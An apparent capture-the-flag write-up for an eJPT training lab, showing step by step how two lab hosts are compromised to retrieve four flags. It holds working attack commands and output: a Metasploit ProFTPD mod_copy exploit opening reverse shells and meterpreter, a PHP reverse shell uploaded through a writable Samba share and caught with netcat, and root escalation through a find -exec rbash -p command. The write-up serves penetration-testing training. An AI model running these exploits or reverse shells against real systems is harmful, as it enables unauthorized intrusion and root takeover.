eJPT - Host & Network Penetration Testing: Exploitation CTF 3
Lab Environment
Two machines are accessible at target1.ine.local and target2.ine.local. Enumerate the targets, identify and exploit the misconfigurations or vulnerabilities to capture the flags. The flag is in an md5 hash format.
- Flag 1: A vulnerable service maybe running on target1.ine.local. If exploitable, retrieve the flag from the root directory.
- Flag 2: Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.
- Flag 3: A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?
- Flag 4: Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?
Tools
- Metasploit
- Nmap
- Python3
- Netcat
- smbmap
- smbclient
- Netstat
Flag 1:
A vulnerable service maybe running on target1.ine.local. If exploitable, retrieve the flag from the root directory.
We’ll start with the information gathering phase, with the help of Nmap and here is the information we managed to get form the target1 from ine machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿INE)-[~]
└─# nmap -sC -sV target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 20:31 IST
Nmap scan report for target1.ine.local (192.131.172.3)
Host is up (0.000026s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 02:42:C0:83:AC:03 (Unknown)
Service Info: OS: Unix
Noting much to find in here let’s start with ftp by search for the vulnerability with the help of MSF console. and we need to set site path to var/www/html because of root directory of the website is located in there.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhost target1.ine.local
rhost => target1.ine.local
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set lhost 192.131.172.2
lhost => 192.131.172.2
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
sitepath => /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] Started reverse TCP handler on 192.131.172.2:4444
[*] 192.131.172.3:80 - 192.131.172.3:21 - Connected to FTP server
[*] 192.131.172.3:80 - 192.131.172.3:21 - Sending copy commands to FTP server
[*] 192.131.172.3:80 - Executing PHP payload /Fad5Zni.php
[-] 192.131.172.3:80 - Unable to delete /var/www/html/Fad5Zni.php
[*] Command shell session 1 opened (192.131.172.2:4444 -> 192.131.172.3:45816) at 2025-05-31 20:42:12 +0530
[-] 192.131.172.3:80 - Exploit aborted due to failure: unknown: 192.131.172.3:21 - Failure executing payload
[!] 192.131.172.3:80 - This exploit may require manual cleanup of '/var/www/html/Fad5Zni.php' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.131.172.2:4444 -> 192.131.172.3:45816 (192.131.172.3)
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.131.172.2:4433
[*] Sending stage (1017704 bytes) to 192.131.172.3
[*] Meterpreter session 2 opened (192.131.172.2:4433 -> 192.131.172.3:51648) at 2025-05-31 20:42:59 +0530
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.131.172.2:4444 -> 192.131.172.3:45816 (192.131.172.3)
2 meterpreter x86/linux www-data @ target1.ine.local 192.131.172.2:4433 -> 192.131.172.3:51648 (192.131.172.3)
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : target1.ine.local
OS : Ubuntu 20.04 (Linux 6.8.0-40-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > cd /
meterpreter > dir
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 0 fil 2025-05-31 20:29:21 +0530 .dockerenv
040755/rwxr-xr-x 12288 dir 2024-11-19 13:22:02 +0530 bin
040755/rwxr-xr-x 4096 dir 2020-04-15 16:39:51 +0530 boot
040755/rwxr-xr-x 340 dir 2025-05-31 20:29:21 +0530 dev
040755/rwxr-xr-x 4096 dir 2025-05-31 20:29:21 +0530 etc
100644/rw-r--r-- 80 fil 2025-05-31 20:29:21 +0530 flag1.txt
040755/rwxr-xr-x 4096 dir 2020-04-15 16:39:51 +0530 home
040755/rwxr-xr-x 4096 dir 2024-11-19 13:21:57 +0530 lib
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:31 +0530 lib32
040755/rwxr-xr-x 4096 dir 2024-10-11 07:39:13 +0530 lib64
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:31 +0530 libx32
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 media
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 mnt
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 opt
040555/r-xr-xr-x 0 dir 2025-05-31 20:29:21 +0530 proc
040755/rwxr-xr-x 4096 dir 2024-11-19 13:22:58 +0530 proftpd-1.3.5
040700/rwx------ 4096 dir 2024-10-11 07:39:22 +0530 root
040755/rwxr-xr-x 4096 dir 2025-05-31 20:29:23 +0530 run
040755/rwxr-xr-x 4096 dir 2024-11-19 13:21:42 +0530 sbin
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 srv
040555/r-xr-xr-x 0 dir 2024-10-17 17:52:10 +0530 sys
041777/rwxrwxrwx 4096 dir 2025-05-31 20:43:01 +0530 tmp
040755/rwxr-xr-x 4096 dir 2024-10-11 07:33:34 +0530 usr
040755/rwxr-xr-x 4096 dir 2024-11-19 13:21:30 +0530 var
meterpreter > cat flag1.txt
FLAG1{dd00901f10634a13832************}
Remember, the magical word is 'letmein'
meterpreter >
Flag 2:
Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.
For this we’ll enumerate the local service that are running on the target1 machine and let’s took a look at 8888 port. along with cred we fond in flag1.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
meterpreter > netstat -tuln 127.0.0.1
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 127.0.0.1:8888 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.11:45289 0.0.0.0:* LISTEN 65534 0
tcp 0.0.0.0:21 0.0.0.0:* LISTEN 65534 0
tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0
tcp 192.131.172.3:80 192.131.172.2:45167 CLOSE_WAIT 33 0
tcp 192.131.172.3:51648 192.131.172.2:4433 ESTABLISHED 33 0
tcp 192.131.172.3:45816 192.131.172.2:4444 ESTABLISHED 33 0
udp 127.0.0.11:49631 0.0.0.0:* 65534 0
meterpreter > shell
Process 89 created.
Channel 3 created.
nc 127.0.0.1 8888
Enter the secret passphrase: letmein
FLAG2{2fe2f4c3ff78437195a48259b*******}
Flag 3:
A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?
Let’s start with information gathering phase with the help of Nmap and here is the results
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿INE)-[~]
└─# nmap -sC -sV target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 21:32 IST
Nmap scan report for target2.ine.local (192.245.33.4)
Host is up (0.000034s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Can you Pwn me?
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:C0:F5:21:04 (Unknown)
Host script results:
|_nbstat: NetBIOS name: TARGET2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-05-31T16:02:29
|_ start_date: N/A
Now that we found the service running on target2 machine service like samba and apache let’s drive in with enum4linux into target. and we found a share in there so we’ll connect to that using smbclient. After navitgating it seems like file are stored in here and can be access through site-share. But now as gain access to this we’ll upload a shell to site-uploads and access it from there.
For this we’ll be using php-reverse shell which can be access in here usr/share/webshells/php/php-reverse-shell.php just change the IP address and Port number if required. and upload it to the site-uploads then deploy the netcat listener to catch the connection.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
enum4linux -a target2.ine.local
──(root㉿INE)-[~]
└─# smbclient //target2.ine.local/site-uploads
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Nov 19 13:25:31 2024
.. D 0 Tue Nov 19 13:25:31 2024
1981311780 blocks of size 1024. 86551592 blocks available
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (1788.4 kb/s) (average 1788.4 kb/s)
Here we got the connection back and found the flag3!
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿INE)-[~]
└─# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.245.33.2] from (UNKNOWN) [192.245.33.4] 56918
Linux target2.ine.local 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
16:21:08 up 295 days, 11:03, 0 users, load average: 0.98, 0.57, 0.45
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cat flag3.txt
FLAG3{cf56725a4e0043d1a3a02a7f8********}
$
Flag4:
Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?
Every Linux system stores the list of valid login shells in the /etc/shells file. These shells can sometimes be exploited if misconfigured.
1
2
cat /etc/shells
This command will display something like:
1
2
3
4
5
6
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
/usr/bin/zsh
Note: The command find / -perm -4000 2>/dev/null does the following:
find /: Starts searching from the root directory /. -perm -4000: Looks for files with the SetUID permission bit set. This allows users to execute the file with the permissions of the file’s owner. 2>/dev/null: Suppresses error messages (e.g., permission denied messages) by redirecting them to /dev/null, effectively ignoring them.
1
2
3
4
5
6
$ find / -exec /bin/rbash -p \; -quit
whoami
root
cat /root/flag4.txt
FLAG4{d1038e2989e8427fb283b6************}